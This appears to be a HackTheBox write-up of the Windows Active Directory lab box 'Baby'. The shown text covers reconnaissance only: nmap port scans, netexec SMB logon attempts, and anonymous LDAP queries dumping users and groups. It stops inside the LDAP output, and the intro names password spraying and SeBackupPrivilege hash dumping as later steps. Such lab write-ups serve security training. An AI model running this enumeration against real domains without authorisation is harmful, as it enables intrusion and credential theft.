Baby

Baby is an easy Windows Active Directory box. I’ll start by enumerating LDAP to find a default credential, and spray it to find another account it works on. From there, I’ll abuse Backup Operators / SeBackupPrivilege to get dump both the local and domain hashes, finding a hash for the Administrator account that works to get a shell.

Box Info

Name Baby Baby
Play on HackTheBox
Release Date 18 Sep 2025
Retire Date 18 Sep 2025
OS Windows Windows
Base Points Easy [20]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creator xct

Recon

Initial Scanning

nmap finds 21 open TCP ports:

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.20.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 00:41 UTC
...[snip]...
Completed SYN Stealth Scan at 00:42, 26.51s elapsed (65535 total ports)
Nmap scan report for 10.129.20.55
Host is up, received echo-reply ttl 127 (0.022s latency).
Scanned at 2025-09-18 00:41:53 UTC for 27s
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49669/tcp open  unknown          syn-ack ttl 127
51832/tcp open  unknown          syn-ack ttl 127
51833/tcp open  unknown          syn-ack ttl 127
51842/tcp open  unknown          syn-ack ttl 127
53587/tcp open  unknown          syn-ack ttl 127
54390/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.61 seconds
           Raw packets sent: 262098 (11.532MB) | Rcvd: 34 (1.480KB)
oxdf@hacky$ nmap -p 53,88,135,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.20.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 00:43 UTC
Nmap scan report for 10.129.20.55
Host is up (0.022s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-18 14:34:50Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-09-18T14:34:53
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 13h51m38s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.36 seconds

The box shows many of the ports associated with a Windows Domain Controller. The domain is baby.vl, and the hostname is BABYDC.

I’ll use netexec to make a hosts file entry and put it at the top of my /etc/hosts file:

oxdf@hacky$ netexec smb 10.129.20.55 --generate-hosts-file hosts
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
oxdf@hacky$ cat hosts 
10.129.20.55     BABYDC.baby.vl baby.vl BABYDC
oxdf@hacky$ cat hosts /etc/hosts | sudo sponge /etc/hosts

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

nmap notes a clock skew, so I’ll want to make sure to run sudo ntpdate BABYDC.baby.vl before any actions that use Kerberos auth.

SMB - TCP 445

The guest account is disables, and anonymous login fails:

oxdf@hacky$ netexec smb 10.129.20.55 -u guest -p '' --shares
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\guest: STATUS_ACCOUNT_DISABLED 
oxdf@hacky$ netexec smb 10.129.20.55 -u 0xdf -p '' --shares
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\0xdf: STATUS_LOGON_FAILURE 

I’ll try to check --users and --rid-brute, but neither of these work either. I’ll have to come back with creds.

LDAP - TCP 389

I’ll try using netexec to dump LDAP data on the users on the box, and this works. I’ll start by taking a look at all the objects:

oxdf@hacky$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(objectClass=*)" "" | grep "Response for object:"
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

I’ll do a full dump on the users:

oxdf@hacky$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(sAMAccountName=*)" ""
LDAP        10.129.20.55    389    BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP        10.129.20.55    389    BABYDC           [+] baby.vl\:
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Allowed RODC Password Replication Group
LDAP        10.129.20.55    389    BABYDC           description          Members in this group can have their passwords replicated to all read-only domain controllers in the domain
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12402
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12404
LDAP        10.129.20.55    389    BABYDC           name                 Allowed RODC Password Replication Group
LDAP        10.129.20.55    389    BABYDC           objectGUID           7a320b26-be6c-8344-a875-344eb415a428
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-571
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Allowed RODC Password Replication Group
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       536870912
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483644
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Ashley Webb
LDAP        10.129.20.55    389    BABYDC           sn                   Webb
LDAP        10.129.20.55    389    BABYDC           givenName            Ashley
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Ashley Webb
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12803
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12808
LDAP        10.129.20.55    389    BABYDC           name                 Ashley Webb
LDAP        10.129.20.55    389    BABYDC           objectGUID           3f551e09-c519-1943-bac7-2c21ff71b0fe
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810633407081
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1105
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Ashley.Webb
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Ashley.Webb@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Cert Publishers
LDAP        10.129.20.55    389    BABYDC           description          Members of this group are permitted to publish certificates to the directory
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12342
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12344
LDAP        10.129.20.55    389    BABYDC           name                 Cert Publishers
LDAP        10.129.20.55    389    BABYDC           objectGUID           c76f0c13-98d2-2745-b85f-19cb164f1c19
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-517
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Cert Publishers
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       536870912
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483644
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Cloneable Domain Controllers
LDAP        10.129.20.55    389    BABYDC           description          Members of this group that are domain controllers may be cloned.
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12440
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12442
LDAP        10.129.20.55    389    BABYDC           name                 Cloneable Domain Controllers
LDAP        10.129.20.55    389    BABYDC           objectGUID           01076276-3f7a-934c-8a02-1e475f08d65a
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-522
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Cloneable Domain Controllers
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                person
LDAP        10.129.20.55    389    BABYDC                                organizationalPerson
LDAP        10.129.20.55    389    BABYDC                                user
LDAP        10.129.20.55    389    BABYDC           cn                   Connor Wilkinson
LDAP        10.129.20.55    389    BABYDC           sn                   Wilkinson
LDAP        10.129.20.55    389    BABYDC           givenName            Connor
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151108.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          Connor Wilkinson
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12849
LDAP        10.129.20.55    389    BABYDC           memberOf             CN=it,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12854
LDAP        10.129.20.55    389    BABYDC           name                 Connor Wilkinson
LDAP        10.129.20.55    389    BABYDC           objectGUID           0929b836-8c42-3c41-a99e-9964cd96a973
LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819810684117255
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1110
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Connor.Wilkinson
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Connor.Wilkinson@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Denied RODC Password Replication Group
LDAP        10.129.20.55    389    BABYDC           description          Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
LDAP        10.129.20.55    389    BABYDC           member               CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12405
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12433
LDAP        10.129.20.55    389    BABYDC           name                 Denied RODC Password Replication Group
LDAP        10.129.20.55    389    BABYDC           objectGUID           1655911c-23d2-da43-bee2-cdd9b59d02a9
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-572
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Denied RODC Password Replication Group
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       536870912
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483644
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121145159.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000417.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   dev
LDAP        10.129.20.55    389    BABYDC           member               CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC                                CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=dev,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121151102.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121151103.0Z
LDAP        10.129.20.55    389    BABYDC           displayName          dev
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12789
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12840
LDAP        10.129.20.55    389    BABYDC           name                 dev
LDAP        10.129.20.55    389    BABYDC           objectGUID           61bceb45-5fb8-2745-b86d-ee4273858989
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1103
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       dev
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000001.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   DnsAdmins
LDAP        10.129.20.55    389    BABYDC           description          DNS Administrators Group
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145238.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145238.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12486
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12488
LDAP        10.129.20.55    389    BABYDC           name                 DnsAdmins
LDAP        10.129.20.55    389    BABYDC           objectGUID           8de6e9e5-cf6b-8743-9a05-f7b023f43721
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1101
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       DnsAdmins
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       536870912
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483644
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000001.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   DnsUpdateProxy
LDAP        10.129.20.55    389    BABYDC           description          DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145238.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145238.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12491
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12491
LDAP        10.129.20.55    389    BABYDC           name                 DnsUpdateProxy
LDAP        10.129.20.55    389    BABYDC           objectGUID           61cfa35f-57de-bf4e-b66a-af9a0610e66d
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1102
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       DnsUpdateProxy
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163013.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000001.0Z
LDAP        10.129.20.55    389    BABYDC           [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           objectClass          top
LDAP        10.129.20.55    389    BABYDC                                group
LDAP        10.129.20.55    389    BABYDC           cn                   Domain Computers
LDAP        10.129.20.55    389    BABYDC           description          All workstations and servers joined to the domain
LDAP        10.129.20.55    389    BABYDC           distinguishedName    CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           instanceType         4
LDAP        10.129.20.55    389    BABYDC           whenCreated          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           whenChanged          20211121145158.0Z
LDAP        10.129.20.55    389    BABYDC           uSNCreated           12330
LDAP        10.129.20.55    389    BABYDC           uSNChanged           12332
LDAP        10.129.20.55    389    BABYDC           name                 Domain Computers
LDAP        10.129.20.55    389    BABYDC           objectGUID           f2a28fe9-fd8e-6044-831a-8e32bc266126
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-515
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Domain Computers
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       268435456
LDAP        10.129.20.55    389    BABYDC           groupType            -2147483646
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           isCriticalSystemObject TRUE
